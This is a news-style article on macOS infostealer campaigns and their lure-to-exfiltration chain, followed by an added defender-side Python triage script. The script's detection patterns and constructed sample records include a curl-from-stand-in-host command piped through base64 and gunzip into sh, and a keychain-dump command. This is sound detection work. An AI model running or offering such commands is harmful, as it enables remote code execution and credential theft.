Infostealer Campaigns Expand to macOS as Attackers Abuse Python and Trusted Platforms


Infostealer campaigns that once focused mainly on Windows are now expanding aggressively to macOS, using Python and trusted platforms to reach new victims.

Recent attacks show a clear shift: threat actors are abusing online ads, fake apps, and familiar tools to quietly steal credentials, session cookies, and cryptocurrency data from Mac users.

Cross‑platform Python stealers and macOS‑specific families like DigitStealer, MacSync, and Atomic macOS Stealer (AMOS) are at the center of this surge, turning everyday browsing and software installs into high‑risk events for consumers and businesses alike.

These campaigns rely heavily on social engineering that exploits users’ trust.

Malvertising and search‑engine‑poisoned links lead to fake installers or “system fix” utilities that appear legitimate, often wrapped in DMG images or seemingly harmless scripts.

Once executed, the payloads quickly move to harvest browser passwords, keychain entries, crypto wallets, and developer secrets.


For organizations, the theft of cloud credentials and source‑code access can open the door to deeper compromise, including supply chain attacks and ransomware.

Microsoft researchers noted that recent infostealer waves blend macOS‑native techniques with flexible Python tooling to operate across multiple environments.

On macOS, the malware leans on built‑in utilities and AppleScript automation to keep a low profile, while Python stealers are delivered widely through phishing emails and booby‑trapped attachments in corporate networks.

At the same time, attackers are weaponizing trusted platforms such as WhatsApp and fake PDF tools to push stealer payloads, making malicious traffic harder to distinguish from normal activity.

Infection mechanism: from lure to silent data theft

The infection chain typically begins with a lure that looks routine to the victim.

For macOS campaigns, users are steered to spoofed download pages for tools such as DynamicLake or fake AI utilities, or tricked into copy‑pasting Terminal commands that supposedly fix browser or system issues.

When the user runs the installer or command, the malware uses native components like curl, base64 decoding, and gunzip to fetch and unpack additional payloads directly into memory, avoiding obvious file drops.

Scripts executed via osascript or JavaScript for Automation then enumerate the system, query browsers and keychains, and stage stolen data in temporary archives.

Finally, the infostealer exfiltrates these archives to attacker‑controlled domains or command‑and‑control servers using HTTPS POST requests, often over newly registered or low‑reputation infrastructure, completing the compromise with few visible signs to the user.
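As an added, defender-side illustration (not code from the article or from Microsoft), the following Python triages macOS process-execution records for the stages just described: the curl, base64 and gunzip fetch-and-unpack chain, inline osascript/JXA, and keychain or browser-profile access. The record layout, rule names, hostnames and sample records are assumptions constructed for this example.

```python
"""Heuristic triage of macOS process-execution records for the stealer chain
described above. Added example; the tab-separated record layout
(timestamp, user, pid, command line) is hypothetical and every sample
record below is constructed."""
import re
from collections import defaultdict

# Rule names are hypothetical labels chosen for this example.
RULES = [
    ("fetch_decode_unpack",      # curl ... | base64 -d ... | gunzip
     re.compile(r"\bcurl\b.*\|\s*base64\s+(-d|-D|--decode)\b.*\|\s*gunzip", re.I)),
    ("pipe_to_interpreter",      # output piped straight into a shell/python
     re.compile(r"\|\s*(sh|bash|zsh|python3?)\b", re.I)),
    ("osascript_inline",         # AppleScript/JXA passed on the command line
     re.compile(r"\bosascript\b.*\s-e\s", re.I)),
    ("jxa_automation",           # JavaScript for Automation selected
     re.compile(r"\bosascript\b.*-l\s+JavaScript", re.I)),
    ("keychain_query",           # the security(1) tool reading keychains
     re.compile(r"\bsecurity\s+(find-(generic|internet)-password|dump-keychain)", re.I)),
    ("browser_store_access",     # paths of browser profile stores
     re.compile(r"Library/Application Support/(Google/Chrome|Firefox|BraveSoftware)", re.I)),
]

def score_command(cmdline):
    """Return the names of every rule the command line matches."""
    return [name for name, rx in RULES if rx.search(cmdline)]

def triage(records, per_user_threshold=3):
    """Aggregate distinct matched rules per user across all of that user's
    processes, so a multi-stage chain whose single steps look mild still
    surfaces once. Returns {user: sorted rule names} at/above threshold."""
    seen = defaultdict(set)
    for rec in records:
        _ts, user, _pid, cmd = rec.split("\t", 3)
        seen[user].update(score_command(cmd))
    return {u: sorted(r) for u, r in seen.items() if len(r) >= per_user_threshold}

# Constructed records: alice's three form one chain; bob's two are benign.
SAMPLE_RECORDS = [
    "2024-05-01T10:00:01Z\talice\t4021\t/bin/zsh -c \"curl -fsSL https://lure.example.invalid/fix.txt | base64 -d | gunzip | sh\"",
    "2024-05-01T10:00:04Z\talice\t4033\tosascript -l JavaScript -e 'Path(\"/Users/alice/Library/Application Support/Google/Chrome/Default\")'",
    "2024-05-01T10:00:06Z\talice\t4040\t/usr/bin/security dump-keychain login.keychain-db",
    "2024-05-01T10:02:00Z\tbob\t4101\tcurl -fsSL https://updates.example.com/pkg.tgz -o pkg.tgz",
    "2024-05-01T10:03:00Z\tbob\t4110\tosascript -e 'tell application \"Finder\" to activate'",
]

if __name__ == "__main__":
    for user, rules in triage(SAMPLE_RECORDS).items():
        print(f"ALERT user={user} rules={rules}")
```

Per-process thresholds alone miss a chain that spreads its stages over several short-lived processes, which is why the aggregation is keyed on the user rather than the pid.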
